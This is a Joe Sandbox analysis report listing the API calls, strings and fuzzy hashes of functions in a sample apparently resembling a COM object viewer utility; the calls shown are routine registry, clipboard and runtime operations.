                                                                          • Opcode ID: 966b4798113b2ac87c14b8f65df1ef84b58b5dd390c1ed08ac427587318da6cc
                                                                          • Instruction ID: 8d2a27c95c66c97dfa1181fd99e9babc8ddc624be96ad031c9c28c0fb12dc8b0
                                                                          • Opcode Fuzzy Hash: 966b4798113b2ac87c14b8f65df1ef84b58b5dd390c1ed08ac427587318da6cc
                                                                          • Instruction Fuzzy Hash: 9501A2357001599BDF199B15D884BB9BB66FB95324F48403BEC0587391CB309D51DBA0
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2EAB7
                                                                            • Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E
                                                                            • Part of subcall function 00D2EAE6: __EH_prolog3.LIBCMT ref: 00D2EAED
                                                                            • Part of subcall function 00D2EAE6: #338.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EAF7
                                                                            • Part of subcall function 00D2EAE6: #540.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EB0B
                                                                            • Part of subcall function 00D2EAE6: #860.MFC42U(00D2349E,0000000C,00D2EAD7,00000004), ref: 00D2EB27
                                                                            • Part of subcall function 00D2EAE6: #540.MFC42U ref: 00D2EB36
                                                                            • Part of subcall function 00D2EAE6: #540.MFC42U ref: 00D2EB42
                                                                            • Part of subcall function 00D2EAE6: #4155.MFC42U(00000004), ref: 00D2EB50
                                                                            • Part of subcall function 00D2EAE6: #4155.MFC42U(00000008,00000004), ref: 00D2EB5A
                                                                            • Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00D2EB6E
                                                                            • Part of subcall function 00D2EAE6: #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB7E
                                                                            • Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB8D
                                                                            • Part of subcall function 00D2EAE6: #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB9D
                                                                            • Part of subcall function 00D2EAE6: #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBAC
                                                                            • Part of subcall function 00D2EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBB7
                                                                            • Part of subcall function 00D2EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBBF
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #3516#540$#4155#800#861H_prolog3$#338#860malloc
                                                                          • String ID:
                                                                          • API String ID: 1769621591-0
                                                                          • Opcode ID: 275234d491000ecfce5a82d4157d81b30bea4cf893575d47aca4f9a6599c880e
                                                                          • Instruction ID: 4ed9d881a663fdee8aa090ef4544812853f41d2c202540df9c0a236b8cd9f040
                                                                          • Opcode Fuzzy Hash: 275234d491000ecfce5a82d4157d81b30bea4cf893575d47aca4f9a6599c880e
                                                                          • Instruction Fuzzy Hash: ECD0C9A1E4921697DF58BBB9285275E2A91EF54300F54443DF244EA282DEB08900C635
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D30D67
                                                                            • Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E
                                                                            • Part of subcall function 00D31536: __EH_prolog3.LIBCMT ref: 00D3153D
                                                                            • Part of subcall function 00D31536: #366.MFC42U(00000004,00D30D8A,00000004), ref: 00D31547
                                                                            • Part of subcall function 00D31536: #527.MFC42U(00000004,00D30D8A,00000004), ref: 00D3155C
                                                                            • Part of subcall function 00D31536: #529.MFC42U(00000004,00D30D8A,00000004), ref: 00D3156B
                                                                            • Part of subcall function 00D31536: #554.MFC42U(00000004,00D30D8A,00000004), ref: 00D3157A
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3$#366#527#529#554malloc
                                                                          • String ID:
                                                                          • API String ID: 3012659443-0
                                                                          • Opcode ID: f04c683dc5af62ee858d01abfafaf9d9659ef9014c4f501e20e924194209b88a
                                                                          • Instruction ID: 1e6f418d91d34a1cd3a3d0e82bf92e4ebdd7ce31deeaeef0cb8875b1aa9d9411
                                                                          • Opcode Fuzzy Hash: f04c683dc5af62ee858d01abfafaf9d9659ef9014c4f501e20e924194209b88a
                                                                          • Instruction Fuzzy Hash: 12D0C9A5A45206A7DF98BBF9686635D29A19F44300F54443DB285DA281DEB08A008A39
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #439
                                                                          • String ID:
                                                                          • API String ID: 466583480-0
                                                                          • Opcode ID: 1a9309d79157846cfe76f07928f6659eb5fe37ff77aef1a80f8ad5c1c27d7986
                                                                          • Instruction ID: 336e14f22fe27e6940d4cdff0e7eb2720bb43efe644681860e5758b691ae4155
                                                                          • Opcode Fuzzy Hash: 1a9309d79157846cfe76f07928f6659eb5fe37ff77aef1a80f8ad5c1c27d7986
                                                                          • Instruction Fuzzy Hash: 3AC08CB2600274678B106B4DA80688ABBDCC9817A4722005AF801A7340EAF09E0183F5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #4146
                                                                          • String ID:
                                                                          • API String ID: 1848845558-0
                                                                          • Opcode ID: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                          • Instruction ID: 67941684604717c05980a50cb9947f9eda39fc04dd69cdc4f242bc2128bc5e65
                                                                          • Opcode Fuzzy Hash: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                          • Instruction Fuzzy Hash: 99C0123700014DBBCF015F55DC01D9A3B69EB40320F004000FC28451A1CB72D830AA70
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: __wgetmainargs
                                                                          • String ID:
                                                                          • API String ID: 1709950718-0
                                                                          • Opcode ID: 8fee84e376180df1589c4ee6ee9aa2f675f938024edc234f1abec58a2f0d2f49
                                                                          • Instruction ID: ac975a2291436b329230227265260260a49a1176ef9974ed4f59d11c968bcb68
                                                                          • Opcode Fuzzy Hash: 8fee84e376180df1589c4ee6ee9aa2f675f938024edc234f1abec58a2f0d2f49
                                                                          • Instruction Fuzzy Hash: 0AD0C978AC1301BF8600DF1CAC03C023A68A216B027010125B591E2361D7E2C3548B72
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000000B,?,00000000), ref: 00D2E19A
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 90ed68b3640220bc0d331cb250fa73167bd5641d75163e1709c21cbc6bcdc9be
                                                                          • Instruction ID: 759803a13419ed328a27a5a17149abf794de56bd233c9b4583d9f1afc0cb99c9
                                                                          • Opcode Fuzzy Hash: 90ed68b3640220bc0d331cb250fa73167bd5641d75163e1709c21cbc6bcdc9be
                                                                          • Instruction Fuzzy Hash: 3EC02B33040308B7DB210F41DC05F823F29E785721F114010F3080C0B087B3A472D694
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001102,00000000,00000003), ref: 00D355F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 7070fdff95c4eea358cb4ae674faf1bffcb84b32e075fd0ee888bcb57168b22e
                                                                          • Instruction ID: bc50b1009ff4f7c77a2423e2c72037df68bf458fbc6c8afa17654bd01d2a20c8
                                                                          • Opcode Fuzzy Hash: 7070fdff95c4eea358cb4ae674faf1bffcb84b32e075fd0ee888bcb57168b22e
                                                                          • Instruction Fuzzy Hash: 0CC04C37040608BBDF025F91DC09CC57F6AFB99762B51C011F6584917187B399B2EB90
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 42535484fab717aca43a7a32627a2d6fdf4f98e7cdd58af38055652fe246bf23
                                                                          • Instruction ID: 950200d3a8905bef2ada00c38db5c80ee92d2e4214aa1e4cdd752e2040d68f58
                                                                          • Opcode Fuzzy Hash: 42535484fab717aca43a7a32627a2d6fdf4f98e7cdd58af38055652fe246bf23
                                                                          • Instruction Fuzzy Hash: AFC02B33080308BBDB001F41DC05FC17F2AE795721F518010F3180C0B087B3A872D694
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D3963E
                                                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,0000009C,00D3ACE5,?,?), ref: 00D3966E
                                                                          • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 00D397A0
                                                                          • wsprintfW.USER32 ref: 00D39854
                                                                          • wsprintfW.USER32 ref: 00D3986C
                                                                          • wsprintfW.USER32 ref: 00D39925
                                                                          • wsprintfW.USER32 ref: 00D3993B
                                                                          • lstrcpyW.KERNEL32(?,?), ref: 00D39956
                                                                          • #538.MFC42U(00000000), ref: 00D3997D
                                                                          • #538.MFC42U(00000000,00000000), ref: 00D39996
                                                                          • #800.MFC42U(?,?,?,00000000,00000000), ref: 00D399D6
                                                                          • #800.MFC42U ref: 00D399EF
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00D39A0F
                                                                          • RegEnumValueW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?), ref: 00D39A41
                                                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?), ref: 00D39AB4
                                                                          • #538.MFC42U(00000000), ref: 00D39AC2
                                                                            • Part of subcall function 00D39634: memset.MSVCRT ref: 00D39884
                                                                            • Part of subcall function 00D39634: _itow.MSVCRT ref: 00D398C3
                                                                            • Part of subcall function 00D39634: lstrcpyW.KERNEL32(00000000,<cannot coerce data to string>), ref: 00D398FD
                                                                            • Part of subcall function 00D39634: #800.MFC42U(00000000), ref: 00D39AE7
                                                                            • Part of subcall function 00D39634: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00D39AFE
                                                                            • Part of subcall function 00D39634: RegCloseKey.ADVAPI32(?), ref: 00D39B07
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,00000000,?), ref: 00D39B16
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf$#538#800Enum$MessageSendValuelstrcpy$CloseH_prolog3InfoOpenQuery_itowmemset
                                                                          • String ID: %#04X%04X (%lu)$%#08X (%lu)$%s = %s$%s [%s] = %s$%s [<no name>] = %s$<cannot coerce data to string>
                                                                          • API String ID: 88432742-3653656851
                                                                          • Opcode ID: 4a5ad051542d3604e0590af9559b102800e04ad20de5a9d1cbde6fd39a0d7c35
                                                                          • Instruction ID: 0f5917d962204314f77e755297e7dcfc6d2f5736ec1daba3adf14db04571e621
                                                                          • Opcode Fuzzy Hash: 4a5ad051542d3604e0590af9559b102800e04ad20de5a9d1cbde6fd39a0d7c35
                                                                          • Instruction Fuzzy Hash: 6CF15B71900209AFDF15DFA8DC96ABEBBB9EF59300F14442AF446EB291E7709941CB70
                                                                          APIs
                                                                          • #1662.MFC42U ref: 00D348D9
                                                                          • #540.MFC42U ref: 00D348F3
                                                                          • lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
                                                                          • CreateBindCtx.OLE32(00000000,?), ref: 00D34936
                                                                          • MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
                                                                          • #2644.MFC42U ref: 00D349D1
                                                                          • #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
                                                                          • #800.MFC42U(?,00000000), ref: 00D34A19
                                                                          • lstrlenW.KERNEL32(?), ref: 00D34A30
                                                                          • #2810.MFC42U(?,Warning: MkParseDisplayName only ate up to "%s".,?), ref: 00D34A82
                                                                          • #2644.MFC42U ref: 00D34B42
                                                                          • #800.MFC42U ref: 00D34B5D
                                                                          Strings
                                                                          • Yh#, xrefs: 00D34B62
                                                                          • MkParseDisplayName(... "%s" ...) failed., xrefs: 00D349DD
                                                                          • Warning: MkParseDisplayName only ate up to "%s"., xrefs: 00D34A76
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2644#2810#800$#1662#540BindCreateDisplayNameParselstrcpylstrlen
                                                                          • String ID: Yh#$MkParseDisplayName(... "%s" ...) failed.$Warning: MkParseDisplayName only ate up to "%s".
                                                                          • API String ID: 3470803309-3324736657
                                                                          • Opcode ID: 537cbd84ace86cc469663b37fa981b855b92a7eedf753fcae8a70980011ab825
                                                                          • Instruction ID: aef92d9e17add037fc8c555d718dbdad0fd1037ae28b615477bca3927e1df05a
                                                                          • Opcode Fuzzy Hash: 537cbd84ace86cc469663b37fa981b855b92a7eedf753fcae8a70980011ab825
                                                                          • Instruction Fuzzy Hash: C681927594122CAFCB60EFA4EC89BD9B7B5FB58311F1041E5E409A7261DB34AE84CF24
                                                                          APIs
                                                                            • Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
                                                                            • Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4
                                                                            • Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C
                                                                          • GlobalAlloc.KERNEL32(00002002,00000200), ref: 00D33522
                                                                          • GlobalLock.KERNEL32(?), ref: 00D33534
                                                                          • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00D33553
                                                                          • wsprintfW.USER32 ref: 00D33650
                                                                          • GlobalUnlock.KERNEL32(?), ref: 00D3365F
                                                                          • EmptyClipboard.USER32 ref: 00D33670
                                                                          • SetClipboardData.USER32(0000000D,?), ref: 00D3367E
                                                                          • CloseClipboard.USER32 ref: 00D33684
                                                                            • Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlockwsprintf
                                                                          • String ID: <object classid="clsid:%s"></object>$P
                                                                          • API String ID: 2486233384-3677239044
                                                                          • Opcode ID: 02fc099a72e92b50e2d7078fc9a73db262b21ad1d3082400629e412ae3421053
                                                                          • Instruction ID: 542c5d47d9cc214fb03f957218b201d034851fd2018f636cad74a23d445cf3ad
                                                                          • Opcode Fuzzy Hash: 02fc099a72e92b50e2d7078fc9a73db262b21ad1d3082400629e412ae3421053
                                                                          • Instruction Fuzzy Hash: AD519074A012288FEB60EF68CD45B99B7B5FF09304F0041EAE549E7251EB745E84CF22
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00020008,000000FF), ref: 00D3DA51
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00D3DA58
                                                                          • malloc.MSVCRT ref: 00D3DA69
                                                                          • GetTokenInformation.ADVAPI32(000000FF,00000002,00000000,00008000,?), ref: 00D3DA81
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3DAA2
                                                                          • EqualSid.ADVAPI32(00000004,?), ref: 00D3DABD
                                                                          • FreeSid.ADVAPI32(00000000), ref: 00D3DAE4
                                                                          • free.MSVCRT ref: 00D3DAEF
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00D3DAFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpenfreemalloc
                                                                          • String ID:
                                                                          • API String ID: 4152120180-0
                                                                          • Opcode ID: 4df04eff4e9e0c587ec73115eb4a7efa9c2cec7f740b628340ff45131563a175
                                                                          • Instruction ID: 9d59bd88d780ab382d0e7c1cc3a86f27f2e8402690fbd28c2df297e113ba66b6
                                                                          • Opcode Fuzzy Hash: 4df04eff4e9e0c587ec73115eb4a7efa9c2cec7f740b628340ff45131563a175
                                                                          • Instruction Fuzzy Hash: 7C314D35A05319AFDB20DFA4ED89BAEBBB9FF15711F180129E511E2290D7309A45CF70
                                                                          APIs
                                                                            • Part of subcall function 00D378ED: GetFocus.USER32 ref: 00D378ED
                                                                            • Part of subcall function 00D378ED: #2859.MFC42U(00000000), ref: 00D378F4
                                                                            • Part of subcall function 00D37980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D3798C
                                                                          • GlobalAlloc.KERNEL32(00002002,00000080), ref: 00D32F82
                                                                          • GlobalLock.KERNEL32(?), ref: 00D32F8E
                                                                          • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00D32FA3
                                                                          • GlobalUnlock.KERNEL32(?), ref: 00D32FAC
                                                                          • EmptyClipboard.USER32 ref: 00D32FBA
                                                                          • SetClipboardData.USER32(0000000D,?), ref: 00D32FC5
                                                                          • CloseClipboard.USER32 ref: 00D32FCB
                                                                            • Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlock
                                                                          • String ID:
                                                                          • API String ID: 1702833241-0
                                                                          • Opcode ID: c84155ffe676f50c0502fdded5c9b4241b125ace2bef5decf7f85e70c14743ce
                                                                          • Instruction ID: 6a3f9d20767d552059573cf863fc69f74dcb1b15e63ac2298c898eb6f67970e3
                                                                          • Opcode Fuzzy Hash: c84155ffe676f50c0502fdded5c9b4241b125ace2bef5decf7f85e70c14743ce
                                                                          • Instruction Fuzzy Hash: 93211674D00208EFDF24EFA4D84A7ADBBB4EF44305F144169E511A62A1EB748E41CF71
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d56eeba86a34da52e6a1b1aee2313bcf8869fc62b5097d154128e50685821ccd
                                                                          • Instruction ID: 6f1c78ebfec6494d8d478fad2c758b2308edcbc062f5da915a03bb33b4ebefad
                                                                          • Opcode Fuzzy Hash: d56eeba86a34da52e6a1b1aee2313bcf8869fc62b5097d154128e50685821ccd
                                                                          • Instruction Fuzzy Hash: 3021B47B52021AEBD714DB94DC45BBEB7A8EB00350F25512AF942FB290EB74DD409BB0
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D3FE45
                                                                          • memset.MSVCRT ref: 00D3FE6B
                                                                          • memset.MSVCRT ref: 00D3FEF5
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D3FF11
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D3FF31
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00D3FF3B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 1045392073-0
                                                                          • Opcode ID: 2e128354d73440572cc22cb61918aef829aae8b0f92697203aeedf678cdd6330
                                                                          • Instruction ID: 9f0b91afeeba5d94d2336dddb879d73d49651c238ab4faf7ccf44a43d005ffdf
                                                                          • Opcode Fuzzy Hash: 2e128354d73440572cc22cb61918aef829aae8b0f92697203aeedf678cdd6330
                                                                          • Instruction Fuzzy Hash: CF311A75D0531C9BDB10EFA4D989BCCBBB8BF18300F1041AAE50DAB250EB719A848F55
                                                                          APIs
                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D3FD12
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00D3FD21
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D3FD2A
                                                                          • GetTickCount.KERNEL32 ref: 00D3FD33
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00D3FD48
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                          • String ID:
                                                                          • API String ID: 1445889803-0
